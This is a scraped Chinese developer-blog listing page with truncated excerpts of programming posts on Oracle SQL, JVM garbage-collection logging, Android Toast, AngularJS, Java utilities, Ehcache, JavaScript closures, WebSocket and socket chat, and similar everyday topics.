    ----------------------------------------------------分组查询 group by    having   --平均工资和最高工资   select avg(sal)平均工资,max(sal)  from emp ;  --每个部门的平均工资和最高工资
  • uploadify3.1版本参数使用详解 bijian1013 JavaScriptuploadify3.1
    使用:     绑定的界面元素<input id='gallery'type='file'/>$("#gallery").uploadify({设置参数,参数如下}); 设置的属性: id: jQuery(this).attr('id'),//绑定的input的ID langFile: 'http://ww
  • 精通Oracle10编程SQL(17)使用ORACLE系统包 bijian1013 oracle数据库plsql
    /* *使用ORACLE系统包 */ --1.DBMS_OUTPUT --ENABLE:用于激活过程PUT,PUT_LINE,NEW_LINE,GET_LINE和GET_LINES的调用 --语法:DBMS_OUTPUT.enable(buffer_size in integer default 20000); --DISABLE:用于禁止对过程PUT,PUT_LINE,NEW
  • 【JVM一】JVM垃圾回收日志 bit1129 垃圾回收
    将JVM垃圾回收的日志记录下来,对于分析垃圾回收的运行状态,进而调整内存分配(年轻代,老年代,永久代的内存分配)等是很有意义的。JVM与垃圾回收日志相关的参数包括: -XX:+PrintGC -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -Xloggc -XX:+PrintGC 通
  • Toast使用 白糖_ toast
    Android中的Toast是一种简易的消息提示框,toast提示框不能被用户点击,toast会根据用户设置的显示时间后自动消失。     创建Toast 两个方法创建Toast makeText(Context context, int resId, int duration)     参数:context是toast显示在
  • angular.identity boyitech AngularJSAngularJS API
    angular.identiy 描述: 返回它第一参数的函数. 此函数多用于函数是编程. 使用方法: angular.identity(value); 参数详解: Param Type Details value * to be returned. 返回值: 传入的value 实例代码: <!DOCTYPE HTML>
  • java-两整数相除,求循环节 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class CircleDigitsInDivision { /** * 题目:求循环节,若整除则返回NULL,否则返回char*指向循环节。先写思路。函数原型:char*get_circle_digits(unsigned k,unsigned j)
  • Java 日期 周 年 Chen.H javaC++cC#
    /** * java日期操作(月末、周末等的日期操作) * * @author * */ public class DateUtil { /** */ /** * 取得某天相加(减)後的那一天 * * @param date * @param num *
  • [高考与专业]欢迎广大高中毕业生加入自动控制与计算机应用专业 comsci 计算机
          不知道现在的高校还设置这个宽口径专业没有,自动控制与计算机应用专业,我就是这个专业毕业的,这个专业的课程非常多,既要学习自动控制方面的课程,也要学习计算机专业的课程,对数学也要求比较高.....如果有这个专业,欢迎大家报考...毕业出来之后,就业的途径非常广.....      以后
  • 分层查询(Hierarchical Queries) daizj oracle递归查询层次查询
    Hierarchical Queries If a table contains hierarchical data, then you can select rows in a hierarchical order using the hierarchical query clause: hierarchical_query_clause::= start with condi
  • 数据迁移 daysinsun 数据迁移
    最近公司在重构一个医疗系统,原来的系统是两个.Net系统,现需要重构到java中。数据库分别为SQL Server和Mysql,现需要将数据库统一为Hana数据库,发现了几个问题,但最后通过努力都解决了。 1、原本通过Hana的数据迁移工具把数据是可以迁移过去的,在MySQl里面的字段为TEXT类型的到Hana里面就存储不了了,最后不得不更改为clob。 2、在数据插入的时候有些字段特别长
  • C语言学习二进制的表示示例 dcj3sjt126com cbasic
    进制的表示示例 # include <stdio.h> int main(void) { int i = 0x32C; printf("i = %d\n", i); /* printf的用法 %d表示以十进制输出 %x或%X表示以十六进制的输出 %o表示以八进制输出 */ return 0; }
  • NsTimer 和 UITableViewCell 之间的控制 dcj3sjt126com ios
    情况是这样的: 一个UITableView, 每个Cell的内容是我自定义的 viewA viewA上面有很多的动画, 我需要添加NSTimer来做动画, 由于TableView的复用机制, 我添加的动画会不断开启, 没有停止, 动画会执行越来越多.   解决办法: 在配置cell的时候开始动画, 然后在cell结束显示的时候停止动画   查找cell结束显示的代理
  • MySql中case when then 的使用 fanxiaolong casewhenthenend
    select "主键", "项目编号", "项目名称","项目创建时间", "项目状态","部门名称","创建人" union (select pp.id as "主键", pp.project_number as &
  • Ehcache(01)——简介、基本操作 234390216 cacheehcache简介CacheManagercrud
    Ehcache简介 目录 1       CacheManager 1.1      构造方法构建 1.2      静态方法构建 2       Cache 2.1&
  • 最容易懂的javascript闭包学习入门 jackyrong JavaScript
    http://www.ruanyifeng.com/blog/2009/08/learning_javascript_closures.html 闭包(closure)是Javascript语言的一个难点,也是它的特色,很多高级应用都要依靠闭包实现。 下面就是我的学习笔记,对于Javascript初学者应该是很有用的。 一、变量的作用域 要理解闭包,首先必须理解Javascript特殊
  • 提升网站转化率的四步优化方案 php教程分享 数据结构PHP数据挖掘Google活动
    网站开发完成后,我们在进行网站优化最关键的问题就是如何提高整体的转化率,这也是营销策略里最最重要的方面之一,并且也是网站综合运营实例的结果。文中分享了四大优化策略:调查、研究、优化、评估,这四大策略可以很好地帮助用户设计出高效的优化方案。 PHP开发的网站优化一个网站最关键和棘手的是,如何提高整体的转化率,这是任何营销策略里最重要的方面之一,而提升网站转化率是网站综合运营实力的结果。今天,我就分
  • web开发里什么是HTML5的WebSocket? naruto1990 Webhtml5浏览器socket
    当前火起来的HTML5语言里面,很多学者们都还没有完全了解这语言的效果情况,我最喜欢的Web开发技术就是正迅速变得流行的 WebSocket API。WebSocket 提供了一个受欢迎的技术,以替代我们过去几年一直在用的Ajax技术。这个新的API提供了一个方法,从客户端使用简单的语法有效地推动消息到服务器。让我们看一看6个HTML5教程介绍里 的 WebSocket API:它可用于客户端、服
  • Socket初步编程——简单实现群聊 Everyday都不同 socket网络编程初步认识
    初次接触到socket网络编程,也参考了网络上众前辈的文章。尝试自己也写了一下,记录下过程吧:   服务端:(接收客户端消息并把它们打印出来)   public class SocketServer { private List<Socket> socketList = new ArrayList<Socket>(); public s
  • 面试:Hashtable与HashMap的区别(结合线程) toknowme
    昨天去了某钱公司面试,面试过程中被问道 Hashtable与HashMap的区别?当时就是回答了一点,Hashtable是线程安全的,HashMap是线程不安全的,说白了,就是Hashtable是的同步的,HashMap不是同步的,需要额外的处理一下。   今天就动手写了一个例子,直接看代码吧 package com.learn.lesson001; import java
  • MVC设计模式的总结 xp9802 设计模式mvc框架IOC
    随着Web应用的商业逻辑包含逐渐复杂的公式分析计算、决策支持等,使客户机越 来越不堪重负,因此将系统的商业分离出来。单独形成一部分,这样三层结构产生了。 其中‘层’是逻辑上的划分。 三层体系结构是将整个系统划分为如图2.1所示的结构[3] (1)表现层(Presentation layer):包含表示代码、用户交互GUI、数据验证。 该层用于向客户端用户提供GUI交互,它允许用户
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他